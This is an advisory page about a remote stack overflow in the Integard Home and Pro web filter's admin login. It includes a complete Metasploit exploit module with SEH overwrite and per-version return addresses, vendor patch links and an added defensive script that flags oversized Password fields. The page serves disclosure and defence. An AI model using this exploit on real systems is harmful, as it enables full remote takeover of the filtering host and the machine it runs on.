Date: 2010-09-11 00:16:00  Source: compiled by this site

Integard Home and Pro HTTP Request Remote Stack Overflow Vulnerability and Fix [Network Technology]


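Affected versions:
Race River Integard Home 2.0.0.9021
Race River Integard Pro 2.2.0.9026

Vulnerability description:
Integard Home and Pro are Internet content monitoring and filtering systems for home and enterprise use, respectively.

The administration page on port 18881 of the Integard server has a stack overflow vulnerability. A remote attacker can trigger the overflow by supplying an overlong string in the password field, leading to complete control of the application and the operating system.
<*References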
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-061-integard-home-and-pro-v2-remote-http-buffer-overflow-exploit/
http://secunia.com/advisories/41312/
*>
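Test method:

The program (method) provided by this site may be offensive in nature. It is for security research and teaching use only; use at your own risk!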
class Metasploit3 < Msf::Exploit::Remote
 
    include Msf::Exploit::Remote::Tcp
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Integard Home/Pro version 2.0',
            'Description'    => %q{
                    Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
            },
            'Author'  =>
                [
                    'Lincoln',
                    'Nullthreat',
                    'rick2600',
                ],
            'License'       => MSF_LICENSE,
            'Version'       => '$Revision: $',
            'References'    =>
                [
                    ['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread',
                },
            'Payload'        =>
                {
                    'Space'    => 2000,
                    'BadChars'  => "\x00\x20\x26\x2f\x3d\x3f\x5c",
                    'StackAdjustment' => -3500,
                },
            'Platform'       => 'win',
            'Privileged'     => false,
            'Targets'        =>
                [
                    [ 'Automatic Targeting',          { 'auto' => true }],
                    [ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
                    [ 'Integard Pro  2.2.0.9026', { 'Ret' => 0x0040362C,}],
                ],
            'DefaultTarget'  => 0))
 
        register_options(
            [
                Opt::RPORT(18881)
            ], self.class )
    end
 
    #Current version does not work with bind() type of payloads
    #meterpreter, windows/exec  etc works fine
 
    def exploit
        mytarget = target
        if(target['auto'])
            mytarget = nil
            print_status("[*] Automatically detecting the target...")
            connect
            get = "GET /banner.jpg HTTP/1.1\r\n\r\n"
            sock.put(get)
            data = sock.recv(1024)
                if (data =~ /Content-Length: 24584/)
                    print_status("[!] Found Version - Integard Home")
                    mytarget = self.targets[1]
                end
                if (data =~ /Content-Length: 23196/)
                    print_status("[!] Found Version - Integard Pro")
                    mytarget = self.targets[2]
                end
            sock.close
        end
        connect
        print_status("[!] Selected Target: #{mytarget.name}")
        print_status("[*] Building Buffer")
        pay = payload.encoded
        junk = rand_text_alpha_upper(3091 - pay.length)
        jmp = "\xE9\x2B\xF8\xFF\xFF"
        nseh = "\xEB\xF9\x90\x90"
        seh = [mytarget.ret].pack('V')
        buffer = junk + pay + jmp + nseh + seh
        print_status("[*] Sending Request")
        req = "POST /LoginAdmin HTTP/1.1\r\n"
        req << "Host: 192.168.2.129:18881\r\n"
        req << "Content-Length: 1074\r\n\r\n"
        req << "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
        sock.put(req)
        print_status("[*] Request Sent")
        sock.close
        handler
    end
end

Vendor patch:

Race River
----------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page:

http://www.integard.com.au/Release_Notes_Home.htm
http://www.integard.com.au/Release_Notes_Pro.htm
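
Until the vendor update is installed, requests to the admin login can be screened for the pattern the description gives. The following is an added example, not part of the original advisory or the vendor's fix: it inspects one captured request to /LoginAdmin and flags an oversized or non-printable Password field and a Content-Length that disagrees with the body. The 256-byte limit, the function names and the sample host are assumptions.

```ruby
# Added example: screen captured requests to the Integard admin login for
# the overlong-Password pattern. Limit and names are assumptions.
ADMIN_PATH = '/LoginAdmin'  # login endpoint named in the advisory
MAX_PASSWORD_LEN = 256      # assumed policy: no real password is longer

# Returns an array of finding symbols for one raw HTTP request.
def inspect_login_request(raw)
  head, body = raw.b.split("\r\n\r\n", 2)
  body ||= ''
  lines = head.to_s.split("\r\n")
  verb, path = lines.first.to_s.split(' ')
  return [] unless verb == 'POST' && path.to_s.split('?').first == ADMIN_PATH

  headers = lines.drop(1).map { |l| l.split(':', 2) }
                 .select { |kv| kv.length == 2 }
                 .to_h { |k, v| [k.strip.downcase, v.strip] }
  findings = []
  # A declared length that disagrees with the bytes actually sent is a
  # sign of a hand-built request.
  declared = headers['content-length']
  findings << :content_length_mismatch if declared && declared.to_i != body.bytesize

  # Check the raw, still percent-encoded value: conservative for length.
  body.split('&').each do |pair|
    name, value = pair.split('=', 2)
    next unless name == 'Password'
    value ||= ''
    findings << :password_too_long if value.bytesize > MAX_PASSWORD_LEN
    findings << :password_non_printable if value.match?(/[^\x20-\x7e]/n)
  end
  findings
end

# Build a constructed sample request (not captured traffic).
def build_request(body, declared_len = body.bytesize)
  "POST /LoginAdmin HTTP/1.1\r\nHost: filter.example:18881\r\n" \
    "Content-Length: #{declared_len}\r\n\r\n#{body}"
end

if __FILE__ == $PROGRAM_NAME
  tail = '&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login'
  p inspect_login_request(build_request('Password=secret' + tail))
  p inspect_login_request(build_request('Password=' + 'A' * 3100 + tail, 1074))
end
```

The same three conditions can be expressed as rules in a reverse proxy or IDS placed in front of port 18881; restricting access to that port to administrative hosts reduces exposure further.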

